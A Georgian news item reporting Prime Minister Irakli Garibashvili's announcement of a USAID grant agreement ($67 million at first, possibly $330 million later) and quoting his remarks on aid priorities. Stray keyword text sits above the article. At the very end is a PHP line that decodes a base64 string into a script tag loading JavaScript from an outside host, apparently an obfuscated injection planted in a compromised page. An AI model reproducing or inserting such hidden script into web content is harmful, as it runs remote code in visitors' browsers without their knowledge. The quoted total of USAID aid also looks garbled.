celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრის ირაკლი ღარიბაშვილის განცხადებით, დღეს ხელი მოეწერება მნიშვნელოვან საგრანტო შეთანხმებას სტრატეგიულ პარტნიორთან ამერიკის შეერთებულ შტატებთან. საქართველოს მთავრობის მეთაურის ინფორმაციით, USAID პირველ ეტაპზე, დაახლოებით 67 მილიონი დოლარის გრანტს გამოჰყოფს და ეტაპობრივად შესაძლებელი იქნება გრანტის 330 მილიონ დოლარამდე გაზრდა.
 
ამასთანავე, როგორც პრემიერმა აღნიშნა, შეთანხმება მიზნად ისახავს მაღალანაზღაურებადი და ხარისხიანი დასაქმების შექმნას, ანგარიშვალდებული მმართველობის გაძლიერებას და დემოკრატიული მიღწევების განმტკიცებას.
 
„საქართველოს მდგრადი განვითარების ხელშეწყობისთვის შეთანხმება მოიცავს არაერთ სტრატეგიულ მიმართულებას: კონფლიქტების მოგვარებას, სოფლის მეურნეობისა და კერძო სექტორის განვითარებას, კანონის უზენაესობას, ადამიანის უფლებებს, დემოკრატიულ მმართველობას, სამოქალაქო საზოგადოებას, საბაზისო განათლებას, ასევე სოციალურ სერვისებს და გარემოს დაცვას. ეს ყველაფერი, რა თქმა უნდა, ჩვენი ქვეყნის ეკონომიკურ ზრდას და მდგრად განვითარებას, ასევე, თავისუფალი ბაზრისა და ზოგადად დასავლური ორიენტაციის გაძლიერებას ემსახურება. USAID პირველ ეტაპზე, დაახლოებით, 67 მილიონი დოლარის გრანტს გამოყოფს და ეტაპობრივად შესაძლებელი იქნება 330 მილიონ დოლარამდე გაზრდა. ჩვენი ქვეყნისადმი მხოლოდ USAID დახმარება შეადგენს 1 800 000 დოლარს. უკვე განხორციელდა, დაახლოებით, 335 პროგრამა სოფლის მეურნეობის, ენერგეტიკის, ინფრასტრუქტურის, გარემოს დაცვის, განათლების, ჯანდაცვის მიმართულებით. ასევე, მინდა აღვნიშნო, რომ დღეს მიმდინარე პროექტების საერთო ჯამური ღირებულება შეადგენს 260 მილიონ დოლარს და მიმდინარე გვაქვს 35 პროექტი. ასევე, მინდა აღვნიშნო, რომ, რა თქმა უნდა, ეს ყველაფერი ხელს უწყობს ახალი სამუშაო ადგილების შექმნას და პანდემიით დაზარალებული ეკონომიკის სწრაფ აღდგენას.
 
კიდევ ერთხელ ჩვენი მთავრობის სახელით, ჩვენი ხალხის სახელით მინდა მადლობა გადავუხადო ამერიკის მთავრობას, ქალბატონ ელჩს ასეთი მნიშვნელოვანი დახმარებისთვის,“- განაცხადა ირაკლი ღარიბაშვილმა.
1390
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");